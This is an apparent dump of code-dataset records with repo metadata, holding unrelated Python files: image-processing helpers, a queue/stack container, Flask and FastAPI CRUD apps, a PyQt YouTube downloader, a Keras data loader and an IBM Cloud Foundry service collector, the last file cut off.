img=cv2.imdecode(data,cv2.IMREAD_COLOR)\n if cv2.imwrite(fileName,img):\n return fileName\n\ndef reEncode(fileName, afterName):\n cv2.imwrite(afterName, cv2.imread(fileName))\n\ndef transparent2white(fileName):\n data=cv2.imread(fileName, cv2.IMREAD_UNCHANGED)\n if data.shape[2]<4:\n return\n transMask=data[:,:,3]<255\n data[transMask]=(255,255,255,255)\n cv2.cvtColor(data,cv2.COLOR_BGRA2BGR,data)\n cv2.imwrite(fileName,data)\n\ndef padOut(fileName):\n def pad(base: np.ndarray):\n h,w,_=base.shape\n lrpad=max(0,(400-w)//2)\n udpad=max(0,(400-h)//2)\n if lrpad:\n sh=list(base.shape)\n sh[1]=lrpad\n base=np.concatenate([np.zeros(sh, dtype=np.uint8)+255, base, np.zeros(sh, dtype=np.uint8)+255], axis=1)\n if udpad:\n sh=list(base.shape)\n sh[0]=udpad\n base=np.concatenate([np.zeros(sh, dtype=np.uint8)+255, base, np.zeros(sh, dtype=np.uint8)+255], axis=0)\n return base\n \n def crop(base: np.ndarray):\n h,w,_=base.shape\n nw=base.min(axis=2)\n fud=(nw.min(axis=1)==255).astype(np.uint8)\n flr=(nw.min(axis=0)==255).astype(np.uint8)\n ltip=flr.argmin()\n rtip=w-flr[::-1].argmin()\n utip=fud.argmin()\n dtip=h-fud[::-1].argmin()\n return base[utip:dtip, ltip:rtip]\n\n print(fileName)\n base=pad(crop(cv2.imread(fileName)))\n cv2.imwrite(fileName, base)\n","repo_name":"Howon-Shin/SaaS-font","sub_path":"fontmaker/imgProc.py","file_name":"imgProc.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17984708335","text":"#John Matukutire\n#11303324\n#CMPT 145 CRN 27177\n#L16\n\nimport Node as N\n\nclass Container(object):\n\n def __init__(self):\n \"\"\"\n Purpose\n creates an empty container\n \"\"\"\n self.__size = 0 # how many elements in the container\n self.__front = None # the node chain starts here\n self.__back = None # the node chain ends here\n\n\n def size(self):\n \"\"\"\n Purpose\n returns the number of data values in the container\n Return:\n The number of data values in the container\n \"\"\"\n return self.__size\n\n\n def is_empty(self):\n \"\"\"\n Purpose\n checks if the container has no data in it\n Return:\n True if the container has no data, or false otherwise\n \"\"\"\n return self.__size == 0\n\n\n def enqueue(self, value):\n \"\"\"\n Purpose\n adds the given data value to the container\n Pre-conditions:\n value: data to be added\n Post-condition:\n the value is added to the container\n Return:\n (none)\n \"\"\"\n new_node = N.node(value, None)\n\n if self.is_empty():\n self.__front = new_node\n self.__back = new_node\n else:\n prev_last_node = self.__back\n prev_last_node.set_next(new_node)\n self.__back = new_node\n\n self.__size += 1\n\n\n def dequeue(self):\n \"\"\"\n Purpose\n removes and returns a data value from the container\n Note: the container cannot be empty!\n Post-condition:\n the first value is removed from the container\n Return:\n the first value in the container, or None\n \"\"\"\n assert not self.is_empty(), 'dequeued an empty container'\n\n prev_first_node = self.__front\n result = prev_first_node.get_data()\n self.__front = prev_first_node.get_next()\n self.__size -= 1\n if self.__size == 0:\n self.__back = None\n return result\n\n\n def peek(self):\n \"\"\"\n Purpose\n returns the value from the front of the container\n without removing it\n Note: the container cannot be empty!\n Post-condition:\n None\n Return:\n the value at the front of the container\n \"\"\"\n assert not self.is_empty(), 'peeked into an empty container'\n\n first_node = self.__front\n result = first_node.get_data()\n return result\n\n\n def push(self, value):\n \"\"\"\n Purpose\n adds the given data value to the container\n Pre-conditions:\n value: data to be added\n Post-condition:\n the value is added to the container\n Return:\n (none)\n \"\"\"\n new_node = N.node(value, self.__front)\n self.__front = new_node\n self.__size += 1\n\n\n def pop(self):\n \"\"\"\n Purpose\n removes and returns a data value from the container.\n Note: the container cannot be empty!\n Post-condition:\n the first value is removed from the container\n Return:\n the first value in the container, or None\n \"\"\"\n assert not self.is_empty(), 'popped an empty container'\n\n prev_first_node = self.__front\n result = prev_first_node.get_data()\n self.__front = prev_first_node.get_next()\n self.__size -= 1\n return result\n","repo_name":"Matuxy79/asn10","sub_path":"a10q2_Container.py","file_name":"a10q2_Container.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73374838131","text":"from flask import Flask, render_template, request, redirect\nfrom flask_mysqldb import MySQL\n\napp = Flask(__name__)\n\n# Configurations for MySQL database connection.\napp.config['MYSQL_HOST'] = \"localhost\"\napp.config['MYSQL_USER'] = \"root\"\napp.config['MYSQL_PASSWORD'] = \"root\"\napp.config['MYSQL_DB'] = \"zomato_chronicles\"\n\n# Initialize the MySQL object with the Flask app.\nmysql = MySQL(app)\n\n# Homepage route, returning a welcome message.\n@app.route('/')\ndef index():\n return 'Welcome to Zomato Chronicles!'\n\n\n# Endpoint to create a new dish by sending a GET or POST request.\n@app.route('/dishes/create', methods=['GET', 'POST'])\ndef create_dish():\n # If the request is POST, retrieve form data, add the dish to the menu table, and redirect to the dish list.\n # Otherwise, return the HTML template for adding a new dish.\n if request.method == 'POST':\n dishId = request.form['id']\n name = request.form['name']\n price = request.form['price']\n availability = request.form['available']\n\n cur = mysql.connection.cursor()\n cur.execute(\"insert into menu (dishId, name, price, availability) values (%s, %s, %s, %s)\", (dishId, name, price, availability))\n mysql.connection.commit()\n cur.close()\n return redirect('/dishes')\n else:\n return render_template('add_dish.html')\n\n\n# Endpoint to list all dishes in the menu by sending a GET request.\n@app.route('/dishes', methods=['GET'])\ndef list_dishes():\n # Retrieve all dishes from the menu table and render the HTML template to display the list of dishes.\n cur = mysql.connection.cursor()\n allData = cur.execute(\"select * from menu\")\n if allData > 0:\n dishes = cur.fetchall()\n cur.close()\n return render_template('dishes.html', dishes=dishes)\n else:\n return render_template('error.html', error_message='Not found any dish in menu')\n\n\n# Endpoint to update a dish's availability by sending a GET or POST request with the dish_id.\n@app.route('/dishes/update/', methods=['GET', 'POST'])\ndef update_dish(dish_id):\n # If the request is POST, update the availability of the dish with the provided dish_id and redirect to the dish list.\n # Otherwise, return the HTML template to update the dish availability.\n cur = mysql.connection.cursor()\n data = cur.execute(\"select * from menu where dishId = %s\", (dish_id,))\n if data > 0:\n dish = cur.fetchone()\n else:\n return render_template('error.html', error_message='Not found dish in menu')\n\n if request.method == 'POST':\n available = request.form['available']\n cur.execute(\"UPDATE menu SET availability = %s WHERE dishId = %s\", (available, dish_id))\n mysql.connection.commit()\n cur.close()\n return redirect('/dishes')\n else:\n if int(dish[0]) == int(dish_id):\n return render_template('update_dish.html', dish=dish)\n\n\n# Endpoint to delete a dish from the menu by sending a GET request with the dish_id.\n@app.route('/dishes/delete/')\ndef delete_dish(dish_id):\n # Delete the dish with the provided dish_id from the menu table and redirect to the dish list.\n cur = mysql.connection.cursor()\n data = cur.execute(\"select * from menu where dishId = %s\", (dish_id,))\n if data > 0:\n dish = cur.fetchone()\n else:\n return render_template('error.html', error_message='Not found any dish in menu')\n\n cur.execute(\"DELETE FROM menu WHERE dishId = %s\", (dish_id,))\n mysql.connection.commit()\n cur.close()\n print(f\"deleted data -> {dish}\")\n return redirect('/dishes')\n\n\n# Endpoint to create a new order by sending a GET or POST request.\n@app.route('/orders/create', methods=['GET', 'POST'])\ndef create_order():\n # If the request is POST, retrieve form data, check the availability of the dish, add the order to the orders table,\n # and redirect to the order list. Otherwise, return the HTML template for creating a new order.\n if request.method == 'POST':\n orderId = request.form['orderId']\n customerName = request.form['customerName']\n dishId = request.form['dishId']\n status = request.form['status']\n\n cur = mysql.connection.cursor()\n data = cur.execute(\"SELECT * FROM menu WHERE dishId = %s\", (dishId,))\n if data > 0:\n dish = cur.fetchone()\n else:\n return render_template('error.html', error_message='Sorry, Not found dish')\n\n print(\"dish id \" + dishId)\n\n if dish[3] == \"yes\":\n cur.execute(\"INSERT INTO orders (orderId, customerName, dishId, status) VALUES (%s, %s, %s, %s)\", (orderId, customerName, dishId, status))\n mysql.connection.commit()\n cur.close()\n return redirect('/orders')\n else:\n cur.close()\n return render_template('error.html', error_message='Sorry, this dish is not available')\n else:\n return render_template('create_order.html')\n\n\n# Endpoint to update an order's status by sending a GET or POST request with the order_id.\n@app.route('/orders/update/', methods=['GET', 'POST'])\ndef update_order(order_id):\n # If the request is POST, update the status of the order with the provided order_id and redirect to the order list.\n # Otherwise, return the HTML template to update the order status.\n cur = mysql.connection.cursor()\n data = cur.execute(\"select * from orders where orderId = %s\", (order_id,))\n if data > 0:\n order = cur.fetchone()\n else:\n return render_template('error.html', error_message='Not found any dish in menu')\n\n if request.method == \"POST\":\n newStatus = request.form['status']\n cur.execute(\"UPDATE orders SET status = %s WHERE orderId = %s\", (newStatus, order_id))\n mysql.connection.commit()\n cur.close()\n return redirect('/orders')\n else:\n cur.close()\n return render_template('update_order.html', order=order)\n\n\n# Endpoint to list all orders by sending a GET request.\n@app.route('/orders', methods=['GET'])\ndef list_orders():\n # Retrieve all orders from the orders table and render the HTML template to display the list of orders.\n cur = mysql.connection.cursor()\n data = cur.execute(\"select * from orders\")\n if data > 0:\n orders = cur.fetchall()\n cur.close()\n return render_template('orders.html', orders=orders)\n else:\n cur.close()\n return render_template('error.html', error_message='Not found any dish in menu')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Murli0399/Zomato_Chronicles","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70918720052","text":"from fastapi import APIRouter, Depends, File, UploadFile\nfrom app.backend.db.database import get_db\nfrom sqlalchemy.orm import Session\nfrom app.backend.schemas import MedicalLicense, UpdateMedicalLicense, UserLogin, UploadMedicalLicense\nfrom app.backend.classes.medical_license_class import MedicalLicenseClass\nfrom app.backend.auth.auth_user import get_current_active_user\nfrom app.backend.classes.dropbox_class import DropboxClass\nfrom app.backend.classes.document_employee_class import DocumentEmployeeClass\nfrom app.backend.classes.document_type_class import DocumentTypeClass\nimport os\n\nmedical_licenses = APIRouter(\n prefix=\"/medical_licenses\",\n tags=[\"MedicalLicenses\"]\n)\n\n@medical_licenses.get(\"/\")\ndef index(session_user: UserLogin = Depends(get_current_active_user), db: Session = Depends(get_db)):\n data = MedicalLicenseClass(db).get_all()\n\n return {\"message\": data}\n\n@medical_licenses.post(\"/store\")\ndef store(form_data: MedicalLicense = Depends(MedicalLicense.as_form), support: UploadFile = File(...), session_user: UserLogin = Depends(get_current_active_user), db: Session = Depends(get_db)):\n document_type = DocumentTypeClass(db).get(\"id\", form_data.document_type_id)\n\n dropbox_client = DropboxClass(db)\n\n filename = dropbox_client.upload(name=str(form_data.rut), description=str(document_type.document_type), data=support,\n dropbox_path='/medical_licenses/', computer_path=os.path.join('C:\\\\', 'Users', 'jesus', 'OneDrive', 'Desktop', 'erpjis_fastapi', 'backend', 'app', 'backend'))\n \n document_employee_id = DocumentEmployeeClass(db).medical_license_store(form_data)\n\n DocumentEmployeeClass(db).update_file(document_employee_id, filename)\n\n data = MedicalLicenseClass(db).store(form_data, document_employee_id)\n\n return {\"message\": data}\n\n@medical_licenses.delete(\"/delete/{id}\")\ndef delete(id:int, session_user: UserLogin = Depends(get_current_active_user), db: Session = Depends(get_db)):\n medical_license = MedicalLicenseClass(db).get(\"id\", id, 1, 1, 1)\n document_employee = DocumentEmployeeClass(db).get('id', medical_license.document_employee_id)\n document_employee_response = DocumentEmployeeClass(db).delete(medical_license.document_employee_id)\n medical_license_response = MedicalLicenseClass(db).delete(id)\n\n if document_employee_response == 1 and medical_license_response == 1:\n if document_employee.support != None or document_employee.support != '':\n response = DropboxClass(db).delete('/medical_licenses/', document_employee.support)\n\n if response == 1:\n data = 1\n else:\n data = response\n else:\n data = 0\n \n return {\"message\": data}\n\n@medical_licenses.get(\"/edit/{rut}/{page}\")\ndef edit(rut:int, page:int = None, session_user: UserLogin = Depends(get_current_active_user), db: Session = Depends(get_db)):\n data = MedicalLicenseClass(db).get(\"rut\", rut, 2, page)\n\n return {\"message\": data}\n\n@medical_licenses.patch(\"/update/{id}\")\ndef update(id: int, medical_license: UpdateMedicalLicense, session_user: UserLogin = Depends(get_current_active_user), db: Session = Depends(get_db)):\n data = MedicalLicenseClass(db).update(id, medical_license)\n\n return {\"message\": data}\n\n@medical_licenses.get(\"/download/{id}\")\ndef download(id:int, session_user: UserLogin = Depends(get_current_active_user), db: Session = Depends(get_db)):\n data = MedicalLicenseClass(db).download(id)\n\n return {\"message\": data}\n\n@medical_licenses.post(\"/upload\")\ndef upload(form_data: UploadMedicalLicense = Depends(UploadMedicalLicense.as_form), support: UploadFile = File(...), session_user: UserLogin = Depends(get_current_active_user), db: Session = Depends(get_db)):\n dropbox_client = DropboxClass(db)\n\n filename = dropbox_client.upload(name=form_data.rut, description='contrato', data=support,\n dropbox_path='/medical_licenses/', computer_path=os.path.join('C:\\\\', 'Users', 'jesus', 'OneDrive', 'Desktop', 'erpjis_fastapi', 'backend', 'app', 'backend'))\n \n medical_license = MedicalLicenseClass(db).get(\"id\", form_data.medical_license_id)\n data = DocumentEmployeeClass(db).update_file(medical_license.document_employee_id, filename)\n\n return {\"message\": data}\n","repo_name":"jisjesuscova/jisbackend","sub_path":"app/backend/routers/medical_licenses.py","file_name":"medical_licenses.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42949723911","text":"import matplotlib.pyplot as plt\nimport torch\n\nimport numpy as np\n\nfrom ..experimenter import e\n\n\nclass Plotter:\n \"\"\"\n Class used to save the plots graphs during training\n \"\"\"\n\n def __init__(self, file_path='plot.png'):\n self.n_heads = len(e.loss) if isinstance(e.loss, tuple) else 1\n self.file_path = file_path\n self.metrics_names = e['metrics_names']\n\n def on_validation_end(self, ev):\n history = ev['history']\n\n plt.clf()\n plt.figure(figsize=(6, 20))\n\n idxs = list(range(ev['history']['epoch'] + 1))\n\n for i in range(1 + self.n_heads * len(self.metrics_names)):\n train_values = history['train']['losses_summary'] if i == 0 else history['train']['metrics_summary'][i - 1]\n val_values = history['val']['losses_summary'] if i == 0 else history['val']['metrics_summary'][i - 1]\n\n ni = i - 1 - ((i - 1) // len(self.metrics_names)) * len(self.metrics_names)\n description = 'Loss ' if i == 0 else self.metrics_names[ni]\n if i > 0:\n train_values = [x.cpu() if torch.is_tensor(x) else x for x in train_values]\n\n ax = plt.subplot(1 + self.n_heads * len(self.metrics_names), 1, i + 1)\n\n plt.plot([t[0] for t in train_values], label='Train ' + description if 'val_loader' in e else description)\n ax.fill_between(idxs, [t[2] for t in train_values], [t[3] for t in train_values], alpha=0.2)\n\n if 'val_loader' in e:\n if i > 0:\n val_values = [x.cpu() if torch.is_tensor(x) else x for x in val_values]\n\n plt.plot([t[0] for t in val_values], label='Val ' + description)\n ax.fill_between(idxs, [t[0] - t[1] for t in val_values], [t[0] + t[1] for t in val_values], alpha=0.2)\n\n plt.ylabel(description)\n plt.legend()\n\n plt.savefig(e.out(self.file_path), dpi=150)\n plt.close()\n","repo_name":"danfergo/mpc-vitac","sub_path":"dfgiatk/experimenter/event_listeners/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22300662605","text":"from PyQt5.QtWidgets import QWidget\nimport sys\nimport pytube\n\n# from PyQt5.QtGui import QColor, QPalette\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, \\\n QLineEdit, QVBoxLayout, QPushButton, QTextEdit\n\n\n# use QColor.colorNames() to print out the colors strings\n# def set_widget_color(widget, color):\n# palette = widget.palette()\n# palette.setColor(QPalette.Window, QColor(color))\n# widget.setPalette(palette)\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Youtube Downloader By Mo\")\n self.resize(600, 300)\n\n self.input = QLineEdit()\n self.input.setPlaceholderText(\"Enter the Youtube link here\")\n self.input.setStyleSheet(\"\"\"\n background-color: #262626;\n color: #FFFFFF;\n font-family: Titillium;\n font-size: 18px;\n \"\"\")\n\n self.button = QPushButton()\n self.button.setText(\"Download\")\n self.button.setStyleSheet(\"\"\"\n background-color: #262626;\n color: #FFFFFF;\n font-family: Titillium;\n font-size: 18px;\n \"\"\")\n\n self.output = QTextEdit()\n self.output.setText(\"YouTube downloader Ready!\")\n self.output.setReadOnly(True)\n self.output.setStyleSheet(\"background-color:slategray;\")\n\n self.button.clicked.connect(self.download_video)\n\n layout = QVBoxLayout()\n layout.setSpacing(50)\n\n layout.addWidget(self.input)\n layout.addWidget(self.button)\n self.setCentralWidget(self.output)\n\n container = QWidget()\n container.setStyleSheet(\"background-color:gray;\")\n container.setLayout(layout)\n\n self.setMenuWidget(container)\n\n def download_video(self):\n self.output.setText(\"Downloading...\")\n QApplication.processEvents()\n url = self.input.text()\n\n if not url:\n self.output.setText(f\"URL Field is empty\")\n return\n\n try:\n yt = pytube.YouTube(url)\n except Exception as error:\n self.output.setText(f\"URL is not valid!\\n{error}\")\n return\n try:\n yt_object = yt.streams.get_highest_resolution()\n except Exception as error:\n self.output.setText(f\"could not get the required resolution of the video\\n{error}\")\n return\n try:\n yt_object.download('./videos')\n except Exception as error:\n self.output.setText(f\"ERROR: could not download the video\\n{error}\")\n return\n else:\n self.output.setText(\"Video is downloaded\")\n\n\napp = QApplication(sys.argv)\n\nwindow = MainWindow()\nwindow.show()\n\napp.exec()\n","repo_name":"Mokka68/videoDownloaderByMoe","sub_path":"pyqt-first-project.py","file_name":"pyqt-first-project.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37412103535","text":"import os\nimport glob\nimport cv2\nimport numpy as np\nimport random\nimport tensorflow as tf\n# from PIL import Image\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\ndef load_dataset(data_path = './dataset', norm=True):\n def normalize(data):\n # every image is composed of 96x96 cells containing values from 0 to 255 (RGB)\n # dividing by 255 we get values from 0 to 1, then subtract 0.5 to be close to 0\n data = (data / 255) - 0.5\n return data\n\n def load_data(mypath):\n # tensor where we put the data, no images now so 0\n # each image will be 96x96 with 3 layers RGB\n data = np.zeros((0, 150, 150, 3), dtype='uint8')\n labels = np.zeros((0,))\n for i, cla in enumerate(mypath):\n filelist = glob.glob(os.path.join(cla, '*')) # path of all images in folder cla\n tmp_data = np.empty((len(filelist), 150, 150, 3), dtype='uint8') # temp array where we store images\n tmp_labels = np.ones((len(filelist),)) * i # temp array where we store labels\n for j, path in enumerate(filelist):\n image = cv2.imread(path) # read each image getting a vector 96x96x3\n image = cv2.resize(image, (150, 150))\n tmp_data[j, :] = image # put it in the previous array\n data = np.concatenate((data, tmp_data))\n labels = np.concatenate((labels, tmp_labels))\n return data, labels\n\n train_path = glob.glob(os.path.join(data_path, 'train', '*')) # take path of training folders\n train_path.sort() # sort so we are sure that training and test folders are in same order\n print(train_path)\n test_path = glob.glob(os.path.join(data_path, 'test', '*'))\n test_path.sort()\n training_data, training_labels = load_data(train_path) # run function above to get images and labels\n test_data, test_labels = load_data(test_path)\n # perm = np.arange(training_data.shape[0]) # array containing test indices\n # random.shuffle(perm) # randomly shuffle the test data indices\n # test_size = np.floor(training_data.shape[0]*0.3).astype(int)\n # perm = perm[:test_size] # take only the first 1000 (just because previously it was too big)\n # test_data = training_data[perm, :]\n # test_labels = training_labels[perm]\n # training_data = np.delete(training_data, perm, 0)\n # training_labels = np.delete(training_labels, perm, 0)\n if norm:\n training_data = normalize(training_data)\n test_data = normalize(test_data)\n return training_data, training_labels, test_data, test_labels\n\n\ndef augmentation(dataset, labels):\n datagen = ImageDataGenerator(\n rotation_range=20,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n vertical_flip=True,\n fill_mode='nearest')\n datagen.fit(dataset)\n\n aug_data = np.zeros((0, 150, 150, 3), dtype='uint8')\n temp_data = np.empty((9, 150, 150, 3), dtype='uint8')\n\n for data in dataset:\n data = np.expand_dims(data, axis=0)\n for i, image in enumerate(datagen.flow(data, batch_size=9)):\n temp_data[i, :] = image\n if i + 1 == 9:\n break\n aug_data = np.concatenate((aug_data, data, temp_data))\n\n aug_labels = np.repeat(labels, 10)\n\n return aug_data, aug_labels","repo_name":"kidist-amde/image-search-engine","sub_path":"CNN - Giulio/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24553131500","text":"# -------------------------------------------------------------------------------\r\n# Copyright IBM Corp. 2017\r\n# \r\n# Licensed under the Apache License, Version 2.0 (the 'License');\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n# \r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n# \r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an 'AS IS' BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n# -------------------------------------------------------------------------------\r\n\r\nimport json\r\nimport pandas as pd\r\nimport requests\r\nimport urllib\r\n\r\n\r\nclass Collector:\r\n def __init__(self, ibm_cloud_user_api_token=None, ibmid=None, password=None, **kwargs):\r\n\r\n if ibm_cloud_user_api_token is None and (ibmid is None or password is None):\r\n raise Exception('You must specify an IBM Cloud user api_token or an ibmid and password.')\r\n\r\n if ibm_cloud_user_api_token is not None:\r\n self.id = 'apikey'\r\n self.password = ibm_cloud_user_api_token\r\n else:\r\n self.id = ibmid\r\n self.password = password \r\n\r\n self.verbose = True # TODO\r\n\r\n self.base_URL = 'https://api.ng.bluemix.net{}'\r\n self.token = self.getAccessToken() # access token (including type, e.g. \"Bearer 012345\") or None\r\n\r\n\r\n self.cfdata = {\r\n 'organizations' : {},\r\n 'spaces': {},\r\n 'services': {}, # used for name lookup only\r\n 'service_plans': {}, # used for name lookup only\r\n 'service_instances': []\r\n }\r\n\r\n # validate credentials\r\n #print(self.config)\r\n\r\n def getAccessToken(self):\r\n \"\"\"\r\n Mint an access token using the provided id and password\r\n \"\"\"\r\n response = requests.get(self.base_URL.format('/info'))\r\n if response.status_code == 200:\r\n auth_endpoint = response.json()['authorization_endpoint'] + '/oauth/token'\r\n data = 'grant_type=password&username={0}&password={1}'.format(self.id, self.password)\r\n headers = {\r\n 'accept': 'application/json',\r\n 'content-type': 'application/x-www-form-urlencoded;charset=utf-8'\r\n }\r\n response = requests.post(auth_endpoint, data=data, headers=headers, auth=('cf', ''))\r\n if response.status_code == 200:\r\n results = response.json()\r\n return results['token_type'] + ' ' + results['access_token']\r\n else:\r\n raise Exception('Fatal error obtaining auth token. IBM Cloud returned {}.'.format(response))\r\n else:\r\n raise Exception('Fatal error obtaining auth token. IBM Cloud returned {}.'.format(response)) \r\n\r\n def collect(self):\r\n \"\"\"\r\n Collect information about Cloud Foundry service instances that the specified id has access to. Returns a Pandas DataFrame.\r\n \"\"\"\r\n\r\n self.cfdata['organizations'] = {}\r\n\r\n def fetch(url):\r\n http_headers = {\r\n 'accept': 'application/json',\r\n 'content-type': 'application/json',\r\n 'authorization': self.token\r\n }\r\n\r\n response = requests.get(self.base_URL.format(url), headers=http_headers)\r\n if response.status_code == 200:\r\n for resource in response.json().get('resources', []):\r\n self.cfdata['organizations'][resource['metadata']['guid']] = resource['entity']['name'] \r\n return response.json()['next_url']\r\n else:\r\n raise Exception('Fatal error retrieving organization list: {}'.format(response))\r\n\r\n # https://apidocs.cloudfoundry.org/280/services/list_all_services.html\r\n url = '/v2/organizations?results-per-page=100'\r\n\r\n while url is not None:\r\n if self.verbose: \r\n print('Searching for organizations...')\r\n url = fetch(url)\r\n\r\n\r\n \"\"\"\r\n load list of spaces that this id has access to\r\n \"\"\"\r\n\r\n self.cfdata['spaces'] = {}\r\n\r\n def fetch(url):\r\n http_headers = {\r\n 'accept': 'application/json',\r\n 'content-type': 'application/json',\r\n 'authorization': self.token\r\n }\r\n response = requests.get(self.base_URL.format(url), headers=http_headers)\r\n if response.status_code == 200:\r\n for resource in response.json().get('resources', []):\r\n self.cfdata['spaces'][resource['metadata']['guid']] = {\r\n 'space_name': resource['entity']['name'],\r\n 'org_guid': resource['entity']['organization_guid'],\r\n 'org_name': self.cfdata['organizations'][resource['entity']['organization_guid']]\r\n }\r\n return response.json()['next_url']\r\n else:\r\n raise Exception('Fatal error retrieving space list (GET {}): {}'.format(url, response))\r\n\r\n # https://apidocs.cloudfoundry.org/280/organizations/list_all_spaces_for_the_organization.html\r\n for org_guid in self.cfdata['organizations'].keys(): \r\n url = '/v2/organizations/{}/spaces?results-per-page=100'.format(org_guid)\r\n while url is not None:\r\n if self.verbose: \r\n print(' Searching for spaces in organization {}...'.format(self.cfdata['organizations'][org_guid]))\r\n url = fetch(url)\r\n\r\n\r\n \"\"\"\r\n load list of services (this is not user specific)\r\n\r\n \"\"\"\r\n\r\n self.cfdata['services'] = {}\r\n\r\n def fetch(url):\r\n http_headers = {\r\n 'accept': 'application/json',\r\n 'content-type': 'application/json',\r\n 'authorization': self.token\r\n }\r\n response = requests.get(self.base_URL.format(url), headers=http_headers)\r\n if response.status_code == 200:\r\n for resource in response.json().get('resources', []):\r\n self.cfdata['services'][resource['metadata']['guid']] = resource['entity']['label'] \r\n return response.json()['next_url']\r\n else:\r\n raise Exception('Fatal error retrieving service list (GET {}): {}'.format(url, response))\r\n\r\n # https://apidocs.cloudfoundry.org/280/services/list_all_services.html\r\n url = '/v2/services?results-per-page=100'\r\n\r\n while url is not None:\r\n url = fetch(url)\r\n\r\n\r\n \"\"\"\r\n load list of service plans (this is not user specific)\r\n\r\n \"\"\"\r\n\r\n self.cfdata['service_plans'] = {}\r\n\r\n def fetch(url):\r\n http_headers = {\r\n 'accept': 'application/json',\r\n 'content-type': 'application/json',\r\n 'authorization': self.token\r\n }\r\n response = requests.get(self.base_URL.format(url), headers=http_headers)\r\n if response.status_code == 200:\r\n for resource in response.json().get('resources', []):\r\n self.cfdata['service_plans'][resource['metadata']['guid']] = resource['entity']['name'] \r\n return response.json()['next_url'] \r\n else:\r\n raise Exception('Fatal error retrieving service plan information (GET {}): {}'.format(url, response))\r\n\r\n # https://apidocs.cloudfoundry.org/280/service_plans/list_all_service_plans.html\r\n url = '/v2/service_plans?results-per-page=100'\r\n\r\n while url is not None:\r\n url = fetch(url)\r\n\r\n\r\n \"\"\"\r\n load list of service instances that this id has access to\r\n\r\n \"\"\"\r\n\r\n self.cfdata['service_instances'] = []\r\n\r\n def fetch(url):\r\n http_headers = {\r\n 'accept': 'application/json',\r\n 'content-type': 'application/json',\r\n 'authorization': self.token\r\n }\r\n response = requests.get(self.base_URL.format(url), headers=http_headers)\r\n if response.status_code == 200: \r\n for resource in response.json().get('resources', []):\r\n service = {'service_instance_name':resource['entity']['name'],\r\n 'service_instance_guid':resource['metadata']['guid'],\r\n 'service_guid':resource['entity']['service_guid'],\r\n 'created_at':resource['metadata']['created_at'],\r\n 'service_plan_guid': resource['entity'].get('service_plan_guid', None),\r\n 'space_guid': resource['entity'].get('space_guid', None)}\r\n \r\n if self.cfdata['spaces'] is not None and self.cfdata['spaces'].get(service['space_guid'], None) is not None:\r\n service['space_name'] = self.cfdata['spaces'][service['space_guid']]['space_name']\r\n service['org_name'] = self.cfdata['spaces'][service['space_guid']]['org_name']\r\n service['org_guid'] = self.cfdata['spaces'][service['space_guid']]['org_guid']\r\n \r\n if self.cfdata['services'] is not None and self.cfdata['services'].get(service['service_guid'], None) is not None:\r\n service['service_name'] = self.cfdata['services'][service['service_guid']]\r\n else:\r\n service['service_name'] = None\r\n print(' Warning. Found no service name for service \"{}\" guid \"{}\" in org \"{}\" space \"{}\"'.format(service['service_instance_name'],\r\n service['service_guid'],\r\n service['org_name'],\r\n service['space_name'])) \r\n \r\n if self.cfdata['service_plans'] is not None and self.cfdata['service_plans'].get(service['service_plan_guid'], None) is not None:\r\n service['service_plan_name'] = self.cfdata['service_plans'][service['service_plan_guid']]\r\n else:\r\n service['service_plan_name'] = None\r\n print(' Warning. Found no service plan name for service \"{}\" plan guid \"{}\" in org \"{}\" space \"{}\"'.format(service['service_instance_name'],\r\n service['service_plan_guid'],\r\n service['org_name'],\r\n service['space_name']))\r\n self.cfdata['service_instances'].append(service)\r\n return response.json()['next_url'] \r\n else:\r\n raise Exception('Fatal error retrieving service instance information (GET {}): {}'.format(url, response)) \r\n\r\n # https://apidocs.cloudfoundry.org/280/service_instances/list_all_service_instances.html\r\n url = '/v2/service_instances?results-per-page=100'\r\n\r\n while url is not None:\r\n if self.verbose: \r\n print('Searching for service instances...')\r\n url = fetch(url)\r\n\r\n print('Data collection completed.') \r\n\r\n # generate Pandas DataFrame and return it\r\n return pd.DataFrame(self.cfdata['service_instances'])\r\n\r\n","repo_name":"ibm-watson-data-lab/cf-service-credential-browser","sub_path":"cfservices/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":12141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11078811213","text":"import json\nfrom os.path import dirname, abspath\nfrom helpers.print import debug_print\n\ndef get_absolute_rolling_songs_dir():\n return dirname(dirname(abspath(__file__))) + \"/\"\n\ndef read_config():\n # IMPORTANT: config.json is the only thing that's .gitignore'd\n # don't put your details in example.json, or a file with any other name\n with open(get_absolute_rolling_songs_dir() + \"config/config.json\", \"r\") as cfile:\n config = json.load(cfile)\n\n # get required fields from the example file\n with 